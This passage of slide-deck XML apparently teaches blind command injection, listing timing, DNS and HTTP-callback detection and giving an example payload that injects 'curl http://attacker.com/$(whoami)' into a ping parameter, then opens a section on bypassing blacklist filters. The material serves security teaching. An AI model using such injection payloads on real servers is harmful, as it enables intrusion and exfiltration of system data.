        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6450568" y="4484370"/>
            <a:ext cx="2614970" cy="326827"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="2550"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="15213F"/>
                </a:solidFill>
                <a:latin typeface="Roboto Slab" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Slab" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Slab" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Timing Delays</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2050" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6450568" y="4936688"/>
            <a:ext cx="3271123" cy="684609"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="2600"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="15213F"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="15213F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EEEFF1"/>
                </a:highlight>
                <a:latin typeface="Consolas" pitchFamily="34" charset="0"/>
                <a:ea typeface="Consolas" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Consolas" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>sleep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="15213F"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t> commands to detect execution based on response time</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Shape 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10162937" y="4252317"/>
            <a:ext cx="3735348" cy="1601033"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1960"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FBFCFE"/>
          </a:solidFill>
          <a:ln w="22860">
            <a:solidFill>
              <a:srgbClr val="CFD2D8"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10394990" y="4484370"/>
            <a:ext cx="2614970" cy="326827"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="2550"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="15213F"/>
                </a:solidFill>
                <a:latin typeface="Roboto Slab" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Slab" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Slab" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>DNS Lookups</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2050" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10394990" y="4936688"/>
            <a:ext cx="3271242" cy="669369"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="2600"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="15213F"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Forcing the server to query attacker-controlled DNS servers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Shape 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6218515" y="6062543"/>
            <a:ext cx="7679769" cy="1251109"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 2508"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FBFCFE"/>
          </a:solidFill>
          <a:ln w="22860">
            <a:solidFill>
              <a:srgbClr val="CFD2D8"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Text 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6450568" y="6294596"/>
            <a:ext cx="2614970" cy="326827"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="2550"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="15213F"/>
                </a:solidFill>
                <a:latin typeface="Roboto Slab" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Slab" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Slab" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>HTTP Callbacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2050" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6450568" y="6746915"/>
            <a:ext cx="7215664" cy="334685"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="2600"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="15213F"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Making the server send requests to external attacker infrastructure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308616"/>
            <a:ext cx="7657862" cy="708779"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="5550"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4450" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3257B8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Slab" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Slab" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Slab" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Out-of-Band Attack Example</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4450" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="2108121"/>
            <a:ext cx="7371040" cy="425291"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="3300"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2650" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3257B8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Slab" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Slab" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Slab" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Confirming Execution with External Requests</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2650" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="310038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257B8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Slab" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Slab" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Slab" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>The Attack Vector</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Shape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="3709868"/>
            <a:ext cx="6924437" cy="1065848"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3192"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EEEFF1"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Shape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="782479" y="3709868"/>
            <a:ext cx="6947059" cy="1065848"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3192"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EEEFF1"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1009293" y="3879890"/>
            <a:ext cx="6493431" cy="72580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highlight>
                  <a:srgbClr val="EEEFF1"/>
                </a:highlight>
                <a:latin typeface="Consolas" pitchFamily="34" charset="0"/>
                <a:ea typeface="Consolas" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Consolas" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>https://example.com/ping?ip=8.8.8.8%3Bcurl http://attacker.com/$(whoami)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="5030867"/>
            <a:ext cx="6924437" cy="74104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The server executes the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1750" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="15213F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EEEFF1"/>
                </a:highlight>
                <a:latin typeface="Consolas" pitchFamily="34" charset="0"/>
                <a:ea typeface="Consolas" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Consolas" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>whoami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1750" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="15213F"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t> command, and its output (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1750" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="15213F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EEEFF1"/>
                </a:highlight>
                <a:latin typeface="Consolas" pitchFamily="34" charset="0"/>
                <a:ea typeface="Consolas" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Consolas" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>www-data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1750" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="15213F"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>) is embedded into the curl request URL.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="5975985"/>
            <a:ext cx="6924437" cy="362903"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="2850"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1750" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="3257B8"/>
                </a:highlight>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Note: %3B is the URL-encoded semicolon (;)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8279249" y="310038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257B8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Slab" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Slab" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Slab" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Data Exfiltration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8279249" y="3681532"/>
            <a:ext cx="5564862" cy="733425"/>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The attacker monitors their </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1750" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="15213F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EEEFF1"/>
                </a:highlight>
                <a:latin typeface="Consolas" pitchFamily="34" charset="0"/>
                <a:ea typeface="Consolas" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Consolas" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>attacker.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1750" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="15213F"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t> web server access logs and observes:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Shape 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8279249" y="4670108"/>
            <a:ext cx="5564862" cy="702945"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4840"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EEEFF1"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Shape 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8267938" y="4670108"/>
            <a:ext cx="5587484" cy="702945"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4840"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EEEFF1"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8494752" y="4840129"/>
            <a:ext cx="5133856" cy="362903"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="2850"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1750" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="15213F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EEEFF1"/>
                </a:highlight>
                <a:latin typeface="Consolas" pitchFamily="34" charset="0"/>
                <a:ea typeface="Consolas" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Consolas" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>GET /www-data HTTP/1.1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8279249" y="5628203"/>
            <a:ext cx="5564862" cy="1088708"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="2850"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1750" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="15213F"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>This confirms both successful command injection and reveals the server's username—all without any visible output on the vulnerable application.</a:t>
            </a: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34126"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 0"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="709493" y="3092768"/>
            <a:ext cx="7811810" cy="633532"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="4950"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3950" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3257B8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Slab" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Slab" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Slab" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>The Challenge: Bypassing Filters</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3950" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="709493" y="3807381"/>
            <a:ext cx="5815013" cy="380047"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="2950"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3257B8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Slab" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Slab" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Slab" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>When the Application Tries to Block You</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="709493" y="4491514"/>
            <a:ext cx="13211413" cy="648653"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="2550"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1550" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="15213F"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Developers often implement blacklist filters to prevent command injection by blocking common shell metacharacters and dangerous strings. However, this defensive approach has fundamental weaknesses.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1550" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="709493" y="5570815"/>
            <a:ext cx="2810828" cy="316706"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
